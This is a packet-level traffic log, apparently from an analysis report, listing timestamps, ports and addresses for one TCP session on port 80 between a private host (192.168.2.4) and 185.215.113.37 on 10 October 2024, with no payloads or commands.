Oct 10, 2024 18:23:11.702722073 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.702733040 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.702739954 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.702744961 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.702756882 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.702766895 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.702769041 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.702780962 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.702791929 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.702795982 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.702804089 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.702815056 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.702817917 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.702826023 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.702838898 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.702838898 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.702850103 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.702861071 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.702867031 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.702872992 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.702884912 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.702896118 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.702896118 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.702908039 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.702914953 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.702919006 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.702929974 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.702940941 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.702945948 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.702955008 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.702970982 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.702982903 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.702984095 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.702997923 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.703001022 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.703010082 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.703017950 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.703021049 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.703031063 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.703042984 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.703047991 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.703054905 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.703067064 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.703078985 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.703080893 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.703089952 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.703103065 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.703105927 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.703118086 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.703130007 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.703141928 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.703154087 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.703165054 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.703166008 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.703166008 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.703166008 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.703181028 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.703191042 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.703196049 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.703202009 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.703213930 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.703226089 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.703233957 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.703237057 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.703248024 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.703262091 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.703264952 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.703295946 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.703295946 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.703308105 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.703320026 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.703330994 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.703334093 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.703344107 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.703356028 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.703365088 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.703368902 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.703380108 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.703427076 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.703427076 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.703433037 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.738823891 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.738858938 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.738872051 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.738924026 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.738965034 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.738991022 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.739005089 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.739018917 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.739028931 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.739033937 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.739118099 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.739139080 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.739144087 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.739257097 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.739286900 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.739300966 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.739315033 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.739329100 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.739340067 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.739341974 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.739363909 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.739388943 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.739417076 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.739465952 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.739548922 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.739563942 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.739595890 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.739658117 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.739666939 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.739675045 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.739686966 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.739701986 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.739705086 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.739722967 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.739723921 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.739744902 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.739780903 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.739875078 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.739883900 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.739892960 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.739926100 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.739933014 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.739955902 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.739988089 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.739999056 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.740005016 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.740006924 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.740036964 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.740070105 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.765007973 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.765068054 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.765079021 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.765110016 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.765137911 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.765218019 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.765228033 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.765238047 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.765261889 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.765289068 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.765290976 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.765299082 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.765309095 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.765317917 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.765331030 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.765331984 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.765373945 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.765543938 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.765552998 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.765562057 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.765592098 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.765613079 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.790870905 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.790883064 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.790894032 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.790946007 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.790970087 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.790976048 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.790987968 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.791018009 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.791018963 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.791028976 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.791040897 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.791050911 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.791064024 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.791098118 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.791172028 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.791181087 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.791219950 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.791248083 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.791259050 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.791269064 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.791280031 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.791289091 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.791301966 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.791311979 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.791331053 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.791351080 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.791368961 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.791412115 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.791428089 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.791439056 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.791470051 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.791498899 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.791574955 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.791585922 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.791594982 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.791636944 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.791637897 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.791646957 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.791673899 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.791678905 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.791685104 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.791712999 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.791745901 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.791826010 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.791836977 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.791842937 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.791852951 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.791860104 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.791918039 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.792129993 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.792139053 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.792164087 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.792176008 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.792182922 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.792200089 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.792205095 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.792212009 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.792222977 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.792237997 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.792241096 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.792251110 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.792259932 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.792280912 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.792284966 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.792294979 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.792303085 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.792306900 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.792335033 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.792361975 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.792366982 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.792417049 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.792444944 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.792455912 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.792467117 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.792493105 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.792504072 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.792532921 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.792561054 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.792687893 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.792712927 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.792727947 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.792756081 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.792768002 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.792782068 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.792799950 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.792826891 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.792865992 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.792867899 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.792881012 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.792895079 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.792900085 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.792910099 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.792924881 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.792927027 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.792939901 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.792953014 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.792954922 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.792969942 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.792979956 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.793005943 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.793190956 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.793205976 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.793220043 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.793235064 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.793261051 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.793313980 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.793329000 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.793344021 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.793355942 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.793359041 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.793366909 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.793374062 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.793376923 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.793381929 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.793430090 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.832331896 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.832361937 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.832376957 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.832391977 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.832406998 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.832421064 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.832434893 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.832448006 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.832462072 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.832468987 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.832475901 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.832490921 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.832494974 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.832500935 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.832504988 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.832521915 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.832532883 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.832540035 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.832555056 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.832571030 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.832577944 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.832591057 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.832593918 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.832609892 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.832612991 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.832623959 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.832633972 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.832638979 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.832642078 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.832653999 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.832664013 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.832669973 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.832681894 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.832684040 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.832699060 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.832700968 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.832715034 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.832722902 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.832731009 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.832746029 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.832762003 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.832777023 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.832791090 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.832807064 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.832807064 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.832822084 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.832822084 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.832828999 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.855596066 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.855628014 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.855642080 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.855658054 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.855756044 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.855770111 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.855808973 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.855819941 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.855827093 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.855904102 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.855952978 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.855963945 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.855974913 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.856117010 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.856137037 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.856137037 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.856137037 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.856137037 CEST	49731	80	192.168.2.4	185.215.113.37
